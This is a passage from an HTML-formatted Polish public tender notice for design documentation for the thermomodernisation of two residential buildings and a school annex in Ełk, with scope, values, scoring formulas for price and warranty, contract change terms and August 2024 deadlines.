kryteriów (nazwa kryterium, waga,<br/>sposób punktowania):<br/><br/>Nazwa kryterium Waga<br/>Cena 60<br/>Gwarancja 40<br/><br/>1.1. Kryterium Cena (Wc)<br/>Oferta z najniższą ceną otrzyma max. liczbę punktów – przy czym max liczba punktów w tym kryterium to 60 - pozostałym ofertom przyznana zostanie proporcjonalnie mniejsza liczba punktów.<br/>Sposób punktacji za cenę oferty jest następujący:<br/><br/>Wc = Cn/Cp x 60<br/><br/>Cn – najniższa oferowana cena<br/>Cp – cena oferty porównywanej<br/>Wc – wynik<br/><br/>1.2. Kryterium Gwarancja (Wg)<br/>Oferta zawierająca gwarancję na przedmiot zamówienia powyżej 24 miesięcy otrzyma proporcjonalnie więcej punktów, przy czym max. liczba punktów w tym kryterium to 40 - okres oferowanej gwarancji należy określić w pełnych miesiącach.<br/>Sposób punktacji za okres gwarancji:<br/><br/>Wg = Gp/Gn x 40<br/><br/>Gp– okres gwarancji oferty porównywanej po odliczeniu okresu wymaganego tj. 24 miesięcy<br/>Gn – najdłuższy oferowany okres gwarancji po odliczeniu okresu wymaganego tj. 24 miesięcy<br/>Wg – wynik<br/><br/>Uwaga: W przypadku zaoferowania przez Wykonawcę 24-miesięcznej gwarancji na przedmiot zamówienia, oferta otrzyma 0 pkt. w tym kryterium.<br/>Gwarancja udzielona na 48 miesięcy i więcej, będzie przyjęta do liczenia punktacji w tym kryterium jako 48 miesięcy.<br/>Uwaga: minimalny wymagany okres gwarancji to 24 pełnych miesięcy od daty odbioru końcowego, oferta z gwarancją poniżej 24 miesięcy będzie odrzucona jako niezgodna z treścią SWZ.<br/><br/>2. Wynik<br/>Oferta, która uzyska największą sumę punktów w oparciu o ustalone kryteria, zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.<br/>W= Wc + Wg<br/><br/>W – wynik punktowy oferty<br/>Wc – wynik punktowy w kryterium ceny<br/>Wg – wynik punktowy w kryterium gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 – Budynek mieszkalny ul. Mickiewicza 5, 19-300 Ełk<br/>Przedmiotem zamówienia jest opracowanie projektu budowlano – technicznego termomodernizacji budynku mieszkalnego przy ul. Mickiewicza 5 w Ełku.<br/>Budynek znajduje się w strefie ochrony konserwatorskiej. <br/>Kubatura budynku 2021 m3, powierzchnia zabudowy 282,41 m2.<br/>Istniejący budynek mieszkalny, wielorodzinny, posiada trzy kondygnacje nadziemne i 1 kondygnację podziemną. Zbudowany na planie prostokąta, jest to obiekt wolnostojący o prostej formie architektonicznej. Ściany zewnętrzne i wewnętrzne murowane są z cegły na zaprawie wapiennej. Dach o konstrukcji drewnianej krokwiowo - płatwiowej. Podłoga w piwnicy warstwowa wykonana z: posadzka, wylewka z betonu, warstwa betonu chudego oraz podsypka z piasku grubego.<br/>Przy opracowywaniu projektów termomodernizacji budynku należy wykorzystać załączony audyt energetyczny.<br/>W ramach opracowania projektu należy przewidzieć następujące elementy:<br/>1) inwentaryzacja obiektu,<br/>2) docieplenie stropodachu z wymianą pokrycia dachowego wraz z obróbkami blacharskimi, przebudową kominów i rur wywiewnych,<br/>3) docieplenie ściany zewnętrznej północnej oraz tynkiem „ciepłym” pozostałych,<br/>4) docieplenie fundamentów z wykonaniem izolacji przeciwwilgotnościowej,<br/>5) wymiana opaski budynku,<br/>6) wymiana stolarki okiennej oraz drzwi zewnętrznych<br/>7) wymiana instalacji odgromowej.<br/>W ramach zadania Wykonawca wykona badania konserwatorskie na elewacji budynku w celu określenia oryginalnej kolorystyki i sporządzenia programu prac konserwatorskich do remontu elewacji. Program badań konserwatorskich potrzebny jest do uzyskania pozwolenia WKZ na prowadzenie badań.<br/>Projektant przekaże Zamawiającemu:<br/>1)	Projekt budowlany – 4 egz.<br/>2)	Projekty techniczne i wykonawcze wszystkich branż – po 3 egz.<br/>3)	Specyfikacje Techniczne wszystkich branż – po 2 egz.<br/>4)	Przedmiary robót z podziałem na koszty kwalifikowane i niekwalifikowalne w ramach termomodernizacji – 2 egz.<br/>5)	Kosztorys inwestorski z ZZK z podziałem na koszty kwalifikowane i niekwalifikowalne w ramach termomodernizacji – 2 egz.<br/>oraz na informatycznym nośniku danych 1 egz. w formacie PDF i wersji edytowalnej.<br/>Zobowiązuje się projektanta do udzielania odpowiedzi na zadane pytania do SWZ na roboty budowlane.<br/>Projektant zobowiązany będzie do uzyskania pozytywnej opinii Zespołu Opiniującego Projekty Inwestycyjne działającego przy Urzędzie Miasta Ełku, jak również wszystkich uzgodnień, pozwoleń i decyzji administracyjnych niezbędnych do zrealizowania inwestycji, w tym uzgodnienia z konserwatorem zabytków.<br/>Projektant zobowiązany będzie określić powierzchnię netto budynku podlegającą termomodernizacji.<br/>W związku z tym, iż dokumentacja wykorzystana zostanie w postępowaniu o udzielenie zamówienia publicznego na wykonanie robót budowlanych, Wykonawca zobowiązany jest wykonać tę dokumentację zgodnie z wymogami, o których mowa w art. 99 - 103 ustawy z dnia 11września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z późn. zm.), pod rygorem poniesienia konsekwencji finansowych (w pełnych wysokościach) z tytułu ewentualnych korekt finansowych, nałożonych na zamawiającego przez instytucje współfinansujące.<br/><br/>Gwarancja (dotyczy każdej części przedmiotu zamówienia) – minimalny wymagany okres gwarancji to 24 pełnych miesięcy od daty odbioru końcowego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 57500,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert<br/>Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów (nazwa kryterium, waga,<br/>sposób punktowania):<br/><br/>Nazwa kryterium Waga<br/>Cena 60<br/>Gwarancja 40<br/><br/>1.1. Kryterium Cena (Wc)<br/>Oferta z najniższą ceną otrzyma max. liczbę punktów – przy czym max liczba punktów w tym kryterium to 60 - pozostałym ofertom przyznana zostanie proporcjonalnie mniejsza liczba punktów.<br/>Sposób punktacji za cenę oferty jest następujący:<br/><br/>Wc = Cn/Cp x 60<br/><br/>Cn – najniższa oferowana cena<br/>Cp – cena oferty porównywanej<br/>Wc – wynik<br/><br/>1.2. Kryterium Gwarancja (Wg)<br/>Oferta zawierająca gwarancję na przedmiot zamówienia powyżej 24 miesięcy otrzyma proporcjonalnie więcej punktów, przy czym max. liczba punktów w tym kryterium to 40 - okres oferowanej gwarancji należy określić w pełnych miesiącach.<br/>Sposób punktacji za okres gwarancji:<br/><br/>Wg = Gp/Gn x 40<br/><br/>Gp– okres gwarancji oferty porównywanej po odliczeniu okresu wymaganego tj. 24 miesięcy<br/>Gn – najdłuższy oferowany okres gwarancji po odliczeniu okresu wymaganego tj. 24 miesięcy<br/>Wg – wynik<br/><br/>Uwaga: W przypadku zaoferowania przez Wykonawcę 24-miesięcznej gwarancji na przedmiot zamówienia, oferta otrzyma 0 pkt. w tym kryterium.<br/>Gwarancja udzielona na 48 miesięcy i więcej, będzie przyjęta do liczenia punktacji w tym kryterium jako 48 miesięcy.<br/>Uwaga: minimalny wymagany okres gwarancji to 24 pełnych miesięcy od daty odbioru końcowego, oferta z gwarancją poniżej 24 miesięcy będzie odrzucona jako niezgodna z treścią SWZ.<br/><br/>2. Wynik<br/>Oferta, która uzyska największą sumę punktów w oparciu o ustalone kryteria, zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.<br/>W= Wc + Wg<br/><br/>W – wynik punktowy oferty<br/>Wc – wynik punktowy w kryterium ceny<br/>Wg – wynik punktowy w kryterium gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 – Budynek mieszkalny ul. Armii Krajowej 38A, 19-300 Ełk<br/>Przedmiotem zamówienia jest opracowanie projektu budowlano – technicznego termomodernizacji budynku mieszkalnego przy ul. Armii Krajowej 38A w Ełku.<br/>Kubatura budynku 376,92 m3, powierzchnia zabudowy 79,50 m2.<br/>Budynek znajduje się w strefie ochrony konserwatorskiej. <br/>Istniejący budynek mieszkalny, wielorodzinny, posiada dwie kondygnacje nadziemne i 1 kondygnację podziemną.<br/>Zbudowany na planie prostokąta, w zabudowie kwartałowej na ulicy Armii Krajowej 38A, Od strony północnej sąsiedni budynek przylega bezpośrednio do ściany bocznej (szczytowej) budynku objętego opracowaniem . Dach jednospadowy. Prosta forma architektoniczna.<br/>Podłoga w przyziemiu warstwowa wykonana z: posadzka, wylewka z betonu, warstwa betonu chudego oraz podsypka z piasku grubego.<br/>Przy opracowywaniu projektów termomodernizacji budynku należy wykorzystać załączony audyt energetyczny.<br/>W ramach opracowania projektu należy przewidzieć następujące elementy:<br/>1) inwentaryzacja obiektu,<br/>2) docieplenie stropodachu z wymianą pokrycia dachowego wraz z obróbkami blacharskimi, <br/>3) przebudowa kominów i rur wywiewnych,<br/>4) docieplenie ścian zewnętrznych,<br/>5) docieplenie fundamentów z wykonaniem izolacji przeciwwilgotnościowej,<br/>6) wymiana opaski budynku,<br/>7) wymiana stolarki okiennej oraz drzwi zewnętrznych,<br/>8) wymiana instalacji odgromowej,<br/>9) adaptacja pomieszczeń gospodarczych na mieszkalne.<br/>Projektant przekaże Zamawiającemu:<br/>1)	Projekt budowlany – 4 egz.<br/>2)	Projekty techniczne i wykonawcze wszystkich branż – po 3 egz.<br/>3)	Specyfikacje Techniczne wszystkich branż – po 2 egz.<br/>4)	Przedmiary robót z podziałem na koszty kwalifikowane i niekwalifikowalne w ramach termomodernizacji – 2 egz.<br/>5)	Kosztorys inwestorski z ZZK z podziałem na koszty kwalifikowane i niekwalifikowalne w ramach termomodernizacji – 2 egz.<br/>oraz na informatycznym nośniku danych 1 egz. w formacie PDF i wersji edytowalnej.<br/>Zobowiązuje się projektanta do udzielania odpowiedzi na zadane pytania do SWZ na roboty budowlane.<br/>Projektant zobowiązany będzie do uzyskania pozytywnej opinii Zespołu Opiniującego Projekty Inwestycyjne działającego przy Urzędzie Miasta Ełku, jak również wszystkich uzgodnień, pozwoleń i decyzji administracyjnych niezbędnych do zrealizowania inwestycji, w tym uzgodnienia z konserwatorem zabytków.<br/>Projektant zobowiązany będzie określić powierzchnię netto budynku podlegającą termomodernizacji. <br/>W związku z tym, iż dokumentacja wykorzystana zostanie w postępowaniu o udzielenie zamówienia publicznego na wykonanie robót budowlanych, Wykonawca zobowiązany jest wykonać tę dokumentację zgodnie z wymogami, o których mowa w art. 99 - 103 ustawy z dnia 11września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z późn. zm.), pod rygorem poniesienia konsekwencji finansowych (w pełnych wysokościach) z tytułu ewentualnych korekt finansowych, nałożonych na zamawiającego przez instytucje współfinansujące.<br/><br/>Gwarancja (dotyczy każdej części przedmiotu zamówienia) – minimalny wymagany okres gwarancji to 24 pełnych miesięcy od daty odbioru końcowego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 22000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert<br/>Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów (nazwa kryterium, waga,<br/>sposób punktowania):<br/><br/>Nazwa kryterium Waga<br/>Cena 60<br/>Gwarancja 40<br/><br/>1.1. Kryterium Cena (Wc)<br/>Oferta z najniższą ceną otrzyma max. liczbę punktów – przy czym max liczba punktów w tym kryterium to 60 - pozostałym ofertom przyznana zostanie proporcjonalnie mniejsza liczba punktów.<br/>Sposób punktacji za cenę oferty jest następujący:<br/><br/>Wc = Cn/Cp x 60<br/><br/>Cn – najniższa oferowana cena<br/>Cp – cena oferty porównywanej<br/>Wc – wynik<br/><br/>1.2. Kryterium Gwarancja (Wg)<br/>Oferta zawierająca gwarancję na przedmiot zamówienia powyżej 24 miesięcy otrzyma proporcjonalnie więcej punktów, przy czym max. liczba punktów w tym kryterium to 40 - okres oferowanej gwarancji należy określić w pełnych miesiącach.<br/>Sposób punktacji za okres gwarancji:<br/><br/>Wg = Gp/Gn x 40<br/><br/>Gp– okres gwarancji oferty porównywanej po odliczeniu okresu wymaganego tj. 24 miesięcy<br/>Gn – najdłuższy oferowany okres gwarancji po odliczeniu okresu wymaganego tj. 24 miesięcy<br/>Wg – wynik<br/><br/>Uwaga: W przypadku zaoferowania przez Wykonawcę 24-miesięcznej gwarancji na przedmiot zamówienia, oferta otrzyma 0 pkt. w tym kryterium.<br/>Gwarancja udzielona na 48 miesięcy i więcej, będzie przyjęta do liczenia punktacji w tym kryterium jako 48 miesięcy.<br/>Uwaga: minimalny wymagany okres gwarancji to 24 pełnych miesięcy od daty odbioru końcowego, oferta z gwarancją poniżej 24 miesięcy będzie odrzucona jako niezgodna z treścią SWZ.<br/><br/>2. Wynik<br/>Oferta, która uzyska największą sumę punktów w oparciu o ustalone kryteria, zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.<br/>W= Wc + Wg<br/><br/>W – wynik punktowy oferty<br/>Wc – wynik punktowy w kryterium ceny<br/>Wg – wynik punktowy w kryterium gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 – Przybudówka Szkoła Podstawowa Nr 2, 19-300 Ełk <br/>Przedmiotem zamówienia jest opracowanie projektu budowlano – technicznego termomodernizacji budynku przybudówki w Szkole Podstawowej nr 2 w Ełku.<br/>Budynek znajduje się w strefie ochrony konserwatorskiej. <br/>Kubatura budynku 4384,30 m3, powierzchnia zabudowy 435,86 m2.<br/>Przedmiotem opracowania jest budynek oraz łącznik dobudowany do głównej bryły budynku szkoły podstawowej. Budynek ma 3 kondygnacje nadziemne, poddasze użytkowe ogrzewane, jest w pełni podpiwniczony, kondygnacja podziemna jest ogrzewana użytkowa. Ściany budynku użyteczności publicznej są wykonane z cegły pełnej, otynkowane, nieocieplone, dach kryty dachówką. Ściany zewnętrzne z cegły pełnej, tynkowane, nieocieplone. Dach kryty dachówką.<br/>Przy opracowywaniu projektów termomodernizacji budynku należy wykorzystać załączony audyt energetyczny oraz ekspertyzę ornitologiczną.<br/>W ramach opracowania projektu należy przewidzieć następujące elementy:<br/>1) inwentaryzacja obiektu,<br/>2) docieplenie stropodachu z wymianą pokrycia dachowego wraz z obróbkami blacharskimi, przebudową kominów i rur wywiewnych,<br/>3) docieplenie ścian zewnętrznych,<br/>4) docieplenie fundamentów z wykonaniem izolacji przeciwwilgotnościowej,<br/>5) wymiana opaski budynku,<br/>6) wymiana stolarki okiennej oraz drzwi zewnętrznych<br/>7) wymiana instalacji odgromowej.<br/>Projektant przekaże Zamawiającemu:<br/>1)	Projekt budowlany – 4 egz.<br/>2)	Projekty techniczne i wykonawcze wszystkich branż – po 3 egz.<br/>3)	Specyfikacje Techniczne wszystkich branż – po 2 egz.<br/>4)	Przedmiary robót z podziałem na koszty kwalifikowane i niekwalifikowalne w ramach termomodernizacji – 2 egz.<br/>5)	Kosztorys inwestorski z ZZK z podziałem na koszty kwalifikowane i niekwalifikowalne w ramach termomodernizacji – 2 egz.<br/>oraz na informatycznym nośniku danych 1 egz. w formacie PDF i wersji edytowalnej.<br/>Zobowiązuje się projektanta do udzielania odpowiedzi na zadane pytania do SWZ na roboty budowlane.<br/>Projektant zobowiązany będzie do uzyskania pozytywnej opinii Zespołu Opiniującego Projekty Inwestycyjne działającego przy Urzędzie Miasta Ełku, jak również wszystkich uzgodnień, pozwoleń i decyzji administracyjnych niezbędnych do zrealizowania inwestycji, w tym uzgodnienia z konserwatorem zabytków.<br/>Projektant zobowiązany będzie określić powierzchnię netto budynku podlegającą termomodernizacji jak również wypełnić wymogi wynikające z ekspertyzy ornitologicznej tj. rozmieszczenia zastępczych siedlisk ptaków (budki).<br/>W związku z tym, iż dokumentacja wykorzystana zostanie w postępowaniu o udzielenie zamówienia publicznego na wykonanie robót budowlanych, Wykonawca zobowiązany jest wykonać tę dokumentację zgodnie z wymogami, o których mowa w art. 99 - 103 ustawy z dnia 11września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z późn. zm.), pod rygorem poniesienia konsekwencji finansowych (w pełnych wysokościach) z tytułu ewentualnych korekt finansowych, nałożonych na zamawiającego przez instytucje współfinansujące.<br/><br/>Gwarancja (dotyczy każdej części przedmiotu zamówienia) – minimalny wymagany okres gwarancji to 24 pełnych miesięcy od daty odbioru końcowego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 57500,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">100 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert<br/>Wybór oferty dokonany zostanie na podstawie niżej przedstawionych kryteriów (nazwa kryterium, waga,<br/>sposób punktowania):<br/><br/>Nazwa kryterium Waga<br/>Cena 60<br/>Gwarancja 40<br/><br/>1.1. Kryterium Cena (Wc)<br/>Oferta z najniższą ceną otrzyma max. liczbę punktów – przy czym max liczba punktów w tym kryterium to 60 - pozostałym ofertom przyznana zostanie proporcjonalnie mniejsza liczba punktów.<br/>Sposób punktacji za cenę oferty jest następujący:<br/><br/>Wc = Cn/Cp x 60<br/><br/>Cn – najniższa oferowana cena<br/>Cp – cena oferty porównywanej<br/>Wc – wynik<br/><br/>1.2. Kryterium Gwarancja (Wg)<br/>Oferta zawierająca gwarancję na przedmiot zamówienia powyżej 24 miesięcy otrzyma proporcjonalnie więcej punktów, przy czym max. liczba punktów w tym kryterium to 40 - okres oferowanej gwarancji należy określić w pełnych miesiącach.<br/>Sposób punktacji za okres gwarancji:<br/><br/>Wg = Gp/Gn x 40<br/><br/>Gp– okres gwarancji oferty porównywanej po odliczeniu okresu wymaganego tj. 24 miesięcy<br/>Gn – najdłuższy oferowany okres gwarancji po odliczeniu okresu wymaganego tj. 24 miesięcy<br/>Wg – wynik<br/><br/>Uwaga: W przypadku zaoferowania przez Wykonawcę 24-miesięcznej gwarancji na przedmiot zamówienia, oferta otrzyma 0 pkt. w tym kryterium.<br/>Gwarancja udzielona na 48 miesięcy i więcej, będzie przyjęta do liczenia punktacji w tym kryterium jako 48 miesięcy.<br/>Uwaga: minimalny wymagany okres gwarancji to 24 pełnych miesięcy od daty odbioru końcowego, oferta z gwarancją poniżej 24 miesięcy będzie odrzucona jako niezgodna z treścią SWZ.<br/><br/>2. Wynik<br/>Oferta, która uzyska największą sumę punktów w oparciu o ustalone kryteria, zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona wykonawcy, który uzyska najwyższą ilość punktów.<br/>W= Wc + Wg<br/><br/>W – wynik punktowy oferty<br/>Wc – wynik punktowy w kryterium ceny<br/>Wg – wynik punktowy w kryterium gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art.125 ust. 1<br/>ustawy, tj. oświadczenie o nie podleganiu wykluczeniu (wzór załącznik nr 1 do SWZ), składa każdy z wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na podstawie art. 455 ust. 1 pkt. 1 ustawy Pzp, Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz określa warunki tych zmian:<br/>1. w przypadku modyfikacji przedmiotu zamówienia w związku z wystąpieniem robót dodatkowych lub zamiennych, które będą niezbędne dla prawidłowej realizacji projektu a, których nie można było przewidzieć przed zawarciem umowy, wprowadzonych na wniosek Zamawiającego oraz w przypadku zmiany zakresu projektowania wprowadzonej decyzjami administracyjnymi wydanymi lub uprawomocnionymi po dniu rozstrzygnięcia postępowania skutkującego podpisaniem niniejszej umowy i dotyczącymi stron umowy, obiektu budowlanego, prowadzonych prac projektowych lub innych okoliczności mających związek z przedmiotem umowy lub zmiana zakresu projektowania wprowadzona decyzjami Zamawiającego. <br/>2. Zmianę terminu wykonania umowy dopuszcza się w przypadku: <br/>a) wystąpienia robót dodatkowych lub zamiennych, <br/>b) zmiany zakresu projektowania, <br/>c) pomimo dołożenia należytej staranności i wystąpienia z odpowiednim wyprzedzeniem, projektant nie uzyska uzgodnień, opinii lub decyzji pozwalających ukończyć w terminie przedmiot umowy, <br/>d) przedłużonych postępowań administracyjnych związanych z wydawaniem warunków technicznych, opinii, postanowień i decyzji z przyczyn niezależnych od Zamawiającego lub Wykonawcy, <br/>e) innych przyczyn zewnętrznych niezależnych od Zamawiającego oraz Wykonawcy skutkujących wstrzymaniem prac projektowych. <br/>3. Zmianę wysokości wynagrodzenia dopuszcza się w przypadku wystąpienia robót dodatkowych lub zamiennych, koniecznych do prawidłowej realizacji robót. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-22 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Podstawy wykluczenia, o których mowa w Ustawie z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie 